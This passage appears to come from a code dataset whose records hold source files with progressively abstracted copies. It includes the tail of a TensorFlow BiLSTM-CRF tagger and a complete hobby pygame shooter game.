tf.nn.embedding_lookup(self.char_embeddings, self.\n char_ids)\n s = tf.shape(char_embedded)\n char_embedded = tf.reshape(char_embedded, shape=[s[0] * s[1], s[-2],\n 
dim_char])\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_char), cell_bw=cells(hidden_size_char), inputs=\n char_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_char_%d' % n)\n char_embedded = tf.concat((out_fw, out_bw), 2)\n output = tf.reshape(char_embedded[:, -1], shape=[s[0], s[1], 2 *\n hidden_size_char])\n word_embedded = tf.concat([word_embedded, output], axis=-1)\n for n in range(num_layers):\n (out_fw, out_bw), (state_fw, state_bw\n ) = tf.nn.bidirectional_dynamic_rnn(cell_fw=cells(\n hidden_size_word), cell_bw=cells(hidden_size_word), inputs=\n word_embedded, dtype=tf.float32, scope=\n 'bidirectional_rnn_word_%d' % n)\n word_embedded = tf.concat((out_fw, out_bw), 2)\n logits = tf.layers.Dense(word_embedded, len(idx2tag))\n y_t = self.labels\n log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(\n logits, y_t, self.lengths)\n self.cost = tf.reduce_mean(-log_likelihood)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate\n ).minimize(self.cost)\n mask = tf.sequence_mask(self.lengths, maxlen=self.maxlen)\n self.tags_seq, tags_score = tf.contrib.crf.crf_decode(logits,\n transition_params, self.lengths)\n self.tags_seq = tf.identity(self.tags_seq, name='logits')\n y_t = tf.cast(y_t, tf.int32)\n self.prediction = tf.boolean_mask(self.tags_seq, mask)\n mask_label = tf.boolean_mask(y_t, mask)\n correct_pred = tf.equal(self.prediction, mask_label)\n correct_index = tf.cast(correct_pred, tf.float32)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<docstring token>\n<import token>\n\n\nclass Model:\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<docstring token>\n<import token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n" ]
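Note on the tagger record above: its loss and decoder come from TensorFlow 1.x's tf.contrib.crf API (crf_log_likelihood for the training objective, crf_decode for Viterbi inference). A minimal standalone sketch of that pattern follows; the shapes, names, and hyperparameters are illustrative placeholders, not values taken from the record.

import tensorflow as tf  # TF 1.x only; tf.contrib was removed in TF 2.x

num_tags = 5
logits = tf.placeholder(tf.float32, [None, None, num_tags])  # per-token unary scores
labels = tf.placeholder(tf.int32, [None, None])              # gold tag ids
lengths = tf.placeholder(tf.int32, [None])                   # true (unpadded) lengths

# Training objective: negative mean CRF log-likelihood; the tag-transition
# matrix is created and learned as a side effect of this call.
log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(
    logits, labels, lengths)
loss = tf.reduce_mean(-log_likelihood)
train_op = tf.train.AdamOptimizer(0.001).minimize(loss)

# Inference: Viterbi decode with the learned transition matrix.
decoded_tags, best_scores = tf.contrib.crf.crf_decode(
    logits, transition_params, lengths)

The record additionally masks padded positions with tf.sequence_mask before computing accuracy; the sketch omits that step.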
false
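Each record's steps field holds the original source followed by progressively abstracted copies in which docstrings, imports, classes, and function bodies are replaced by placeholders such as <docstring token>, <import token>, <class token>, <function token>, and <code token>. The dump does not say how those copies were produced; the function below is only a guessed reconstruction of a single abstraction pass, written with Python's ast module to illustrate the visible output format.

# Guessed reconstruction, NOT the dataset's real pipeline. Replaces each
# top-level construct with the placeholder token seen in the steps field.
# Requires Python 3.8+ for ast.get_source_segment.
import ast

def abstract_step(source):
    tree = ast.parse(source)
    pieces = []
    for i, node in enumerate(tree.body):
        is_docstring = (i == 0 and isinstance(node, ast.Expr) and
                        isinstance(node.value, ast.Constant) and
                        isinstance(node.value.value, str))
        if is_docstring:
            pieces.append('<docstring token>')
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            pieces.append('<import token>')
        elif isinstance(node, ast.ClassDef):
            pieces.append('<class token>')
        elif isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            pieces.append('<function token>')
        else:
            pieces.append(ast.get_source_segment(source, node))
    return '\n'.join(pieces) + '\n'

The real steps clearly do more than one such pass (runs of imports collapse into a single <import token>, class bodies are hollowed out member by member, and trailing script code becomes <code token>), so treat this purely as a format illustration.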
11
54e04d740ef46fca04cf4169d2e7c05083414bd8
import random import math import time import pygame pygame.init() scr = pygame.display.set_mode((700,700)) enemies = [] #music = pygame.mixer.music.load('ENERGETIC CHIPTUNE Thermal - Evan King.mp3') #pygame.mixer.music.play(-1) hit = [] class Player: def __init__(self): self.x = 275 self.y = 275 self.image = pygame.image.load('player.jpg') self.image1 = pygame.image.load('hearts.png') self.lives = 5 def draw(self): scr.blit(self.image,(self.x,self.y)) def rotate(self, x, y): oppos = math.fabs(y - self.y) adjac = math.fabs(x - self.x) hypot = math.hypot(oppos,adjac) sin = oppos/hypot radians = math.asin(sin) angle = radians * (180/3.14) if x > self.x: if y > self.y: angle -= angle + angle if x < self.x: angle = 180 + (angle - (angle + angle)) if y > self.y: angle -= angle + angle return angle - 90 class Bullet: def __init__(self, color): self.x = 0 self.y = 0 self.angle = 0 self.color = color def draw(self): pygame.draw.rect(scr,self.color,pygame.Rect(self.x,self.y,5,5)) class Gun: def __init__(self): self.x = 0 self.y = 0 self.bullets = [] self.bullets2 = [] def shoot1(self,x,y,angle): self.bullets.append(Bullet((0,255,255))) self.bullets[-1].x = x self.bullets[-1].y = y self.bullets[-1].angle = angle def shoot2(self,x,y,angle): self.bullets2.append(Bullet((255,255,0))) self.bullets2[-1].x = x self.bullets2[-1].y = y self.bullets2[-1].angle = angle class Enemy: def __init__(self): self.x = 100 self.y = 100 self.speed = 2 self.hearts = 3 self.image = pygame.image.load('enemy.png') def draw(self): scr.blit(self.image,(self.x,self.y)) def rotate(self, x, y): oppos = math.fabs(y - self.y) adjac = math.fabs(x - self.x) hypot = math.hypot(oppos,adjac) sin = oppos/hypot radians = math.asin(sin) angle = radians * (180/3.14) if x > self.x: if y > self.y: angle -= angle + angle if x < self.x: angle = 180 + (angle - (angle + angle)) if y > self.y: angle -= angle + angle return angle - 90 def distance(self,x,y): oppos = math.fabs(y - self.y) adjac = math.fabs(x - self.x) hypot = math.hypot(oppos,adjac) return hypot def spawn(self): enemies.append(Enemy()) enemies[-1].x = random.randint(0,600) enemies[-1].y = random.randint(0,600) cmd = Enemy() gun = Gun() player = Player() cmd.spawn() cmd.spawn() last = 0 frames = 0 fro = 1 while True: frames += 1 scr.fill((0,0,0)) for event in pygame.event.get(): key = pygame.key.get_pressed() Mpos = pygame.mouse.get_pos() if event.type == 5: gun.shoot1(player.x + 12.5,player.y + 12.5,angle) for i in range(0,player.lives): scr.blit(player.image1,(i*35,1)) for i in range(len(gun.bullets)): try: gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians(gun.bullets[i].angle + 90)) gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians(gun.bullets[i].angle - 90)) if gun.bullets[i].x > 600: del gun.bullets[i] if gun.bullets[i].x < 0: del gun.bullets[i] if gun.bullets[i].y > 600: del gun.bullets[i] if gun.bullets[i].y < 0: del gun.bullets[i] gun.bullets[i].draw() except IndexError: pass for i in range(len(gun.bullets2)): try: gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.radians(gun.bullets2[i].angle + 90)) gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.radians(gun.bullets2[i].angle - 90)) if gun.bullets2[i].x > 600: del gun.bullets2[i] if gun.bullets2[i].x < 0: del gun.bullets2[i] if gun.bullets2[i].y > 600: del gun.bullets2[i] if gun.bullets2[i].y < 0: del gun.bullets2[i] gun.bullets2[i].draw() except IndexError: pass for i in range(len(enemies)): if enemies[i].distance(player.x,player.y) > 100: enemies[i].x = enemies[i].x + 
enemies[i].speed * math.cos(math.radians(enemies[i].rotate(player.x,player.y) + 90)) enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.radians(enemies[i].rotate(player.x,player.y) - 90)) enemies[i].image = pygame.image.load("enemy.png").convert() enemies[i].image = enemies[i].image.copy() enemies[i].image = pygame.transform.rotate(enemies[i].image,enemies[i].rotate(player.x,player.y)) angle2 = enemies[i].rotate(player.x,player.y) if frames % 100 == 0: gun.shoot2(enemies[i].x + 12.5,enemies[i].y + 12.5,angle2) enemies[i].draw() for j in range(len(gun.bullets)): for i in range(len(gun.bullets)): try: if gun.bullets[j].x > enemies[i].x and gun.bullets[j].x < enemies[i].x+25 and gun.bullets[j].y > enemies[i].y and gun.bullets[j].y < enemies[i].y + 25: del enemies[i] except IndexError: pass for j in range(len(gun.bullets2)): for i in range(len(gun.bullets2)): try: if gun.bullets2[j].x > player.x and gun.bullets2[j].x < player.x+25 and gun.bullets2[j].y > player.y and gun.bullets2[j].y < player.y + 25: for i in range(len(hit)-1): if not (hit[i].x > player.x or hit[i].x < player.x+25 or hit[i].y > player.y or hit[i].y < player.y): del hit[i] if hit.count(gun.bullets2[j]) == 0: hit.append(gun.bullets2[j]) player.lives = 5 - len(hit) except IndexError: pass if key[pygame.K_a]: player.x -= 3 if key[pygame.K_d]: player.x += 3 if key[pygame.K_w]: player.y -= 3 if key[pygame.K_s]: player.y += 3 if frames % 150 == 0: cmd.spawn() if player.lives < 1: pygame.quit() break player.image = pygame.image.load("player.jpg").convert() player.image = player.image.copy() player.image = pygame.transform.rotate(player.image,player.rotate(Mpos[0],Mpos[1])) angle = player.rotate(Mpos[0],Mpos[1]) player.draw() pygame.display.update() time.sleep(0.005) quit()
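Two observations on the game source above. First, both rotate methods build the aim angle from asin plus hand-written quadrant corrections and convert radians with 180/3.14 rather than math.degrees; a single math.atan2 call gives the same angle up to that rounding and up to edge cases (a target straight below the shooter falls through both sign branches, and a target at the shooter's exact position divides by a zero hypotenuse). Second, the bullet collision loops run both indices over range(len(gun.bullets)) while indexing enemies[i], leaning on the IndexError handler. The helpers below are hypothetical replacements sketched from the record's conventions, not part of it:

import math

def aim_angle(src_x, src_y, dst_x, dst_y):
    # Degrees for pygame.transform.rotate under this sprite convention:
    # 0 = facing straight up, positive = counter-clockwise. Matches the
    # record's rotate(), which returns its asin-derived angle minus 90.
    return math.degrees(math.atan2(src_y - dst_y, dst_x - src_x)) - 90

def step_towards(angle, speed):
    # Matches the record's movement update:
    # dx = speed * cos(radians(angle + 90)), dy = speed * sin(radians(angle - 90))
    rad = math.radians(angle)
    return speed * math.cos(rad + math.pi / 2), speed * math.sin(rad - math.pi / 2)

def resolve_hits(bullets, enemies, size=25):
    # Presumed intent of the bullet-vs-enemy check: pair every bullet with
    # every enemy. Iterates over copies so removal is safe mid-loop.
    for bullet in list(bullets):
        for enemy in list(enemies):
            if (enemy.x < bullet.x < enemy.x + size and
                    enemy.y < bullet.y < enemy.y + size):
                enemies.remove(enemy)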
[ "import random\r\nimport math\r\nimport time\r\nimport pygame\r\npygame.init()\r\nscr = pygame.display.set_mode((700,700))\r\nenemies = []\r\n#music = pygame.mixer.music.load('ENERGETIC CHIPTUNE Thermal - Evan King.mp3')\r\n#pygame.mixer.music.play(-1)\r\nhit = []\r\nclass Player:\r\n def __init__(self):\r\n self.x = 275\r\n self.y = 275\r\n self.image = pygame.image.load('player.jpg')\r\n self.image1 = pygame.image.load('hearts.png')\r\n self.lives = 5\r\n def draw(self):\r\n scr.blit(self.image,(self.x,self.y))\r\n def rotate(self, x, y):\r\n oppos = math.fabs(y - self.y)\r\n adjac = math.fabs(x - self.x)\r\n hypot = math.hypot(oppos,adjac)\r\n sin = oppos/hypot\r\n radians = math.asin(sin)\r\n angle = radians * (180/3.14)\r\n if x > self.x: \r\n if y > self.y:\r\n angle -= angle + angle\r\n if x < self.x:\r\n angle = 180 + (angle - (angle + angle))\r\n if y > self.y:\r\n angle -= angle + angle\r\n return angle - 90\r\nclass Bullet:\r\n def __init__(self, color):\r\n self.x = 0\r\n self.y = 0\r\n self.angle = 0\r\n self.color = color\r\n def draw(self):\r\n pygame.draw.rect(scr,self.color,pygame.Rect(self.x,self.y,5,5))\r\nclass Gun:\r\n def __init__(self):\r\n self.x = 0\r\n self.y = 0\r\n self.bullets = []\r\n self.bullets2 = []\r\n def shoot1(self,x,y,angle):\r\n self.bullets.append(Bullet((0,255,255)))\r\n self.bullets[-1].x = x\r\n self.bullets[-1].y = y\r\n self.bullets[-1].angle = angle\r\n def shoot2(self,x,y,angle):\r\n self.bullets2.append(Bullet((255,255,0)))\r\n self.bullets2[-1].x = x\r\n self.bullets2[-1].y = y\r\n self.bullets2[-1].angle = angle\r\nclass Enemy:\r\n def __init__(self):\r\n self.x = 100\r\n self.y = 100\r\n self.speed = 2\r\n self.hearts = 3\r\n self.image = pygame.image.load('enemy.png')\r\n def draw(self):\r\n scr.blit(self.image,(self.x,self.y))\r\n def rotate(self, x, y):\r\n oppos = math.fabs(y - self.y)\r\n adjac = math.fabs(x - self.x)\r\n hypot = math.hypot(oppos,adjac)\r\n sin = oppos/hypot\r\n radians = math.asin(sin)\r\n angle = radians * (180/3.14)\r\n if x > self.x: \r\n if y > self.y:\r\n angle -= angle + angle\r\n if x < self.x:\r\n angle = 180 + (angle - (angle + angle))\r\n if y > self.y:\r\n angle -= angle + angle\r\n return angle - 90\r\n def distance(self,x,y):\r\n oppos = math.fabs(y - self.y)\r\n adjac = math.fabs(x - self.x)\r\n hypot = math.hypot(oppos,adjac)\r\n return hypot\r\n def spawn(self):\r\n enemies.append(Enemy())\r\n enemies[-1].x = random.randint(0,600)\r\n enemies[-1].y = random.randint(0,600)\r\ncmd = Enemy()\r\ngun = Gun() \r\nplayer = Player()\r\ncmd.spawn()\r\ncmd.spawn()\r\nlast = 0\r\nframes = 0\r\nfro = 1\r\nwhile True:\r\n frames += 1\r\n scr.fill((0,0,0))\r\n for event in pygame.event.get():\r\n key = pygame.key.get_pressed()\r\n Mpos = pygame.mouse.get_pos()\r\n if event.type == 5:\r\n gun.shoot1(player.x + 12.5,player.y + 12.5,angle)\r\n for i in range(0,player.lives):\r\n scr.blit(player.image1,(i*35,1))\r\n \r\n for i in range(len(gun.bullets)):\r\n try:\r\n gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians(gun.bullets[i].angle + 90))\r\n gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians(gun.bullets[i].angle - 90))\r\n if gun.bullets[i].x > 600:\r\n del gun.bullets[i]\r\n if gun.bullets[i].x < 0:\r\n del gun.bullets[i]\r\n if gun.bullets[i].y > 600:\r\n del gun.bullets[i]\r\n if gun.bullets[i].y < 0:\r\n del gun.bullets[i]\r\n gun.bullets[i].draw()\r\n except IndexError:\r\n pass\r\n for i in range(len(gun.bullets2)):\r\n try:\r\n gun.bullets2[i].x = gun.bullets2[i].x + 4 * 
math.cos(math.radians(gun.bullets2[i].angle + 90))\r\n gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.radians(gun.bullets2[i].angle - 90))\r\n if gun.bullets2[i].x > 600:\r\n del gun.bullets2[i]\r\n if gun.bullets2[i].x < 0:\r\n del gun.bullets2[i]\r\n if gun.bullets2[i].y > 600:\r\n del gun.bullets2[i]\r\n if gun.bullets2[i].y < 0:\r\n del gun.bullets2[i]\r\n gun.bullets2[i].draw()\r\n except IndexError:\r\n pass\r\n for i in range(len(enemies)):\r\n if enemies[i].distance(player.x,player.y) > 100:\r\n enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.radians(enemies[i].rotate(player.x,player.y) + 90))\r\n enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.radians(enemies[i].rotate(player.x,player.y) - 90))\r\n enemies[i].image = pygame.image.load(\"enemy.png\").convert()\r\n enemies[i].image = enemies[i].image.copy()\r\n enemies[i].image = pygame.transform.rotate(enemies[i].image,enemies[i].rotate(player.x,player.y))\r\n angle2 = enemies[i].rotate(player.x,player.y)\r\n if frames % 100 == 0:\r\n gun.shoot2(enemies[i].x + 12.5,enemies[i].y + 12.5,angle2)\r\n enemies[i].draw()\r\n for j in range(len(gun.bullets)):\r\n for i in range(len(gun.bullets)):\r\n try:\r\n if gun.bullets[j].x > enemies[i].x and gun.bullets[j].x < enemies[i].x+25 and gun.bullets[j].y > enemies[i].y and gun.bullets[j].y < enemies[i].y + 25:\r\n del enemies[i]\r\n except IndexError:\r\n pass\r\n for j in range(len(gun.bullets2)):\r\n for i in range(len(gun.bullets2)):\r\n try:\r\n if gun.bullets2[j].x > player.x and gun.bullets2[j].x < player.x+25 and gun.bullets2[j].y > player.y and gun.bullets2[j].y < player.y + 25:\r\n for i in range(len(hit)-1):\r\n if not (hit[i].x > player.x or hit[i].x < player.x+25 or hit[i].y > player.y or hit[i].y < player.y):\r\n del hit[i]\r\n if hit.count(gun.bullets2[j]) == 0:\r\n hit.append(gun.bullets2[j])\r\n player.lives = 5 - len(hit)\r\n except IndexError:\r\n pass\r\n if key[pygame.K_a]:\r\n player.x -= 3\r\n if key[pygame.K_d]:\r\n player.x += 3\r\n if key[pygame.K_w]:\r\n player.y -= 3\r\n if key[pygame.K_s]:\r\n player.y += 3\r\n if frames % 150 == 0:\r\n cmd.spawn()\r\n if player.lives < 1:\r\n pygame.quit()\r\n break\r\n player.image = pygame.image.load(\"player.jpg\").convert()\r\n player.image = player.image.copy()\r\n player.image = pygame.transform.rotate(player.image,player.rotate(Mpos[0],Mpos[1]))\r\n angle = player.rotate(Mpos[0],Mpos[1])\r\n player.draw()\r\n pygame.display.update()\r\n time.sleep(0.005)\r\nquit()\r\n\r\n", "import random\nimport math\nimport time\nimport pygame\npygame.init()\nscr = pygame.display.set_mode((700, 700))\nenemies = []\nhit = []\n\n\nclass Player:\n\n def __init__(self):\n self.x = 275\n self.y = 275\n self.image = pygame.image.load('player.jpg')\n self.image1 = pygame.image.load('hearts.png')\n self.lives = 5\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 
0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\ncmd = Enemy()\ngun = Gun()\nplayer = Player()\ncmd.spawn()\ncmd.spawn()\nlast = 0\nframes = 0\nfro = 1\nwhile True:\n frames += 1\n scr.fill((0, 0, 0))\n for event in pygame.event.get():\n key = pygame.key.get_pressed()\n Mpos = pygame.mouse.get_pos()\n if event.type == 5:\n gun.shoot1(player.x + 12.5, player.y + 12.5, angle)\n for i in range(0, player.lives):\n scr.blit(player.image1, (i * 35, 1))\n for i in range(len(gun.bullets)):\n try:\n gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians\n (gun.bullets[i].angle + 90))\n gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians\n (gun.bullets[i].angle - 90))\n if gun.bullets[i].x > 600:\n del gun.bullets[i]\n if gun.bullets[i].x < 0:\n del gun.bullets[i]\n if gun.bullets[i].y > 600:\n del gun.bullets[i]\n if gun.bullets[i].y < 0:\n del gun.bullets[i]\n gun.bullets[i].draw()\n except IndexError:\n pass\n for i in range(len(gun.bullets2)):\n try:\n gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.\n radians(gun.bullets2[i].angle + 90))\n gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.\n radians(gun.bullets2[i].angle - 90))\n if gun.bullets2[i].x > 600:\n del gun.bullets2[i]\n if gun.bullets2[i].x < 0:\n del gun.bullets2[i]\n if gun.bullets2[i].y > 600:\n del gun.bullets2[i]\n if gun.bullets2[i].y < 0:\n del gun.bullets2[i]\n gun.bullets2[i].draw()\n except IndexError:\n pass\n for i in range(len(enemies)):\n if enemies[i].distance(player.x, player.y) > 100:\n enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.\n radians(enemies[i].rotate(player.x, player.y) + 90))\n enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.\n radians(enemies[i].rotate(player.x, player.y) - 90))\n enemies[i].image = pygame.image.load('enemy.png').convert()\n enemies[i].image = enemies[i].image.copy()\n enemies[i].image = pygame.transform.rotate(enemies[i].image,\n enemies[i].rotate(player.x, player.y))\n angle2 = enemies[i].rotate(player.x, player.y)\n if frames % 100 == 0:\n gun.shoot2(enemies[i].x + 12.5, enemies[i].y + 12.5, angle2)\n enemies[i].draw()\n for j in range(len(gun.bullets)):\n for i in range(len(gun.bullets)):\n try:\n if gun.bullets[j].x > enemies[i].x and gun.bullets[j\n ].x < enemies[i].x + 25 and gun.bullets[j].y > enemies[i\n ].y and 
gun.bullets[j].y < enemies[i].y + 25:\n del enemies[i]\n except IndexError:\n pass\n for j in range(len(gun.bullets2)):\n for i in range(len(gun.bullets2)):\n try:\n if gun.bullets2[j].x > player.x and gun.bullets2[j\n ].x < player.x + 25 and gun.bullets2[j\n ].y > player.y and gun.bullets2[j].y < player.y + 25:\n for i in range(len(hit) - 1):\n if not (hit[i].x > player.x or hit[i].x < player.x +\n 25 or hit[i].y > player.y or hit[i].y < player.y):\n del hit[i]\n if hit.count(gun.bullets2[j]) == 0:\n hit.append(gun.bullets2[j])\n player.lives = 5 - len(hit)\n except IndexError:\n pass\n if key[pygame.K_a]:\n player.x -= 3\n if key[pygame.K_d]:\n player.x += 3\n if key[pygame.K_w]:\n player.y -= 3\n if key[pygame.K_s]:\n player.y += 3\n if frames % 150 == 0:\n cmd.spawn()\n if player.lives < 1:\n pygame.quit()\n break\n player.image = pygame.image.load('player.jpg').convert()\n player.image = player.image.copy()\n player.image = pygame.transform.rotate(player.image, player.rotate(Mpos\n [0], Mpos[1]))\n angle = player.rotate(Mpos[0], Mpos[1])\n player.draw()\n pygame.display.update()\n time.sleep(0.005)\nquit()\n", "<import token>\npygame.init()\nscr = pygame.display.set_mode((700, 700))\nenemies = []\nhit = []\n\n\nclass Player:\n\n def __init__(self):\n self.x = 275\n self.y = 275\n self.image = pygame.image.load('player.jpg')\n self.image1 = pygame.image.load('hearts.png')\n self.lives = 5\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n\nclass Bullet:\n\n def __init__(self, color):\n self.x = 0\n self.y = 0\n self.angle = 0\n self.color = color\n\n def draw(self):\n pygame.draw.rect(scr, self.color, pygame.Rect(self.x, self.y, 5, 5))\n\n\nclass Gun:\n\n def __init__(self):\n self.x = 0\n self.y = 0\n self.bullets = []\n self.bullets2 = []\n\n def shoot1(self, x, y, angle):\n self.bullets.append(Bullet((0, 255, 255)))\n self.bullets[-1].x = x\n self.bullets[-1].y = y\n self.bullets[-1].angle = angle\n\n def shoot2(self, x, y, angle):\n self.bullets2.append(Bullet((255, 255, 0)))\n self.bullets2[-1].x = x\n self.bullets2[-1].y = y\n self.bullets2[-1].angle = angle\n\n\nclass Enemy:\n\n def __init__(self):\n self.x = 100\n self.y = 100\n self.speed = 2\n self.hearts = 3\n self.image = pygame.image.load('enemy.png')\n\n def draw(self):\n scr.blit(self.image, (self.x, self.y))\n\n def rotate(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n sin = oppos / hypot\n radians = math.asin(sin)\n angle = radians * (180 / 3.14)\n if x > self.x:\n if y > self.y:\n angle -= angle + angle\n if x < self.x:\n angle = 180 + (angle - (angle + angle))\n if y > self.y:\n angle -= angle + angle\n return angle - 90\n\n def distance(self, x, y):\n oppos = math.fabs(y - self.y)\n adjac = math.fabs(x - self.x)\n hypot = math.hypot(oppos, adjac)\n return hypot\n\n def spawn(self):\n enemies.append(Enemy())\n enemies[-1].x = random.randint(0, 600)\n enemies[-1].y = random.randint(0, 600)\n\n\ncmd = Enemy()\ngun = Gun()\nplayer = Player()\ncmd.spawn()\ncmd.spawn()\nlast = 0\nframes = 0\nfro = 1\nwhile True:\n frames += 1\n scr.fill((0, 0, 0))\n for event 
in pygame.event.get():\n key = pygame.key.get_pressed()\n Mpos = pygame.mouse.get_pos()\n if event.type == 5:\n gun.shoot1(player.x + 12.5, player.y + 12.5, angle)\n for i in range(0, player.lives):\n scr.blit(player.image1, (i * 35, 1))\n for i in range(len(gun.bullets)):\n try:\n gun.bullets[i].x = gun.bullets[i].x + 4 * math.cos(math.radians\n (gun.bullets[i].angle + 90))\n gun.bullets[i].y = gun.bullets[i].y + 4 * math.sin(math.radians\n (gun.bullets[i].angle - 90))\n if gun.bullets[i].x > 600:\n del gun.bullets[i]\n if gun.bullets[i].x < 0:\n del gun.bullets[i]\n if gun.bullets[i].y > 600:\n del gun.bullets[i]\n if gun.bullets[i].y < 0:\n del gun.bullets[i]\n gun.bullets[i].draw()\n except IndexError:\n pass\n for i in range(len(gun.bullets2)):\n try:\n gun.bullets2[i].x = gun.bullets2[i].x + 4 * math.cos(math.\n radians(gun.bullets2[i].angle + 90))\n gun.bullets2[i].y = gun.bullets2[i].y + 4 * math.sin(math.\n radians(gun.bullets2[i].angle - 90))\n if gun.bullets2[i].x > 600:\n del gun.bullets2[i]\n if gun.bullets2[i].x < 0:\n del gun.bullets2[i]\n if gun.bullets2[i].y > 600:\n del gun.bullets2[i]\n if gun.bullets2[i].y < 0:\n del gun.bullets2[i]\n gun.bullets2[i].draw()\n except IndexError:\n pass\n for i in range(len(enemies)):\n if enemies[i].distance(player.x, player.y) > 100:\n enemies[i].x = enemies[i].x + enemies[i].speed * math.cos(math.\n radians(enemies[i].rotate(player.x, player.y) + 90))\n enemies[i].y = enemies[i].y + enemies[i].speed * math.sin(math.\n radians(enemies[i].rotate(player.x, player.y) - 90))\n enemies[i].image = pygame.image.load('enemy.png').convert()\n enemies[i].image = enemies[i].image.copy()\n enemies[i].image = pygame.transform.rotate(enemies[i].image,\n enemies[i].rotate(player.x, player.y))\n angle2 = enemies[i].rotate(player.x, player.y)\n if frames % 100 == 0:\n gun.shoot2(enemies[i].x + 12.5, enemies[i].y + 12.5, angle2)\n enemies[i].draw()\n for j in range(len(gun.bullets)):\n for i in range(len(gun.bullets)):\n try:\n if gun.bullets[j].x > enemies[i].x and gun.bullets[j\n ].x < enemies[i].x + 25 and gun.bullets[j].y > enemies[i\n ].y and gun.bullets[j].y < enemies[i].y + 25:\n del enemies[i]\n except IndexError:\n pass\n for j in range(len(gun.bullets2)):\n for i in range(len(gun.bullets2)):\n try:\n if gun.bullets2[j].x > player.x and gun.bullets2[j\n ].x < player.x + 25 and gun.bullets2[j\n ].y > player.y and gun.bullets2[j].y < player.y + 25:\n for i in range(len(hit) - 1):\n if not (hit[i].x > player.x or hit[i].x < player.x +\n 25 or hit[i].y > player.y or hit[i].y < player.y):\n del hit[i]\n if hit.count(gun.bullets2[j]) == 0:\n hit.append(gun.bullets2[j])\n player.lives = 5 - len(hit)\n except IndexError:\n pass\n if key[pygame.K_a]:\n player.x -= 3\n if key[pygame.K_d]:\n player.x += 3\n if key[pygame.K_w]:\n player.y -= 3\n if key[pygame.K_s]:\n player.y += 3\n if frames % 150 == 0:\n cmd.spawn()\n if player.lives < 1:\n pygame.quit()\n break\n player.image = pygame.image.load('player.jpg').convert()\n player.image = player.image.copy()\n player.image = pygame.transform.rotate(player.image, player.rotate(Mpos\n [0], Mpos[1]))\n angle = player.rotate(Mpos[0], Mpos[1])\n player.draw()\n pygame.display.update()\n time.sleep(0.005)\nquit()\n", "<import 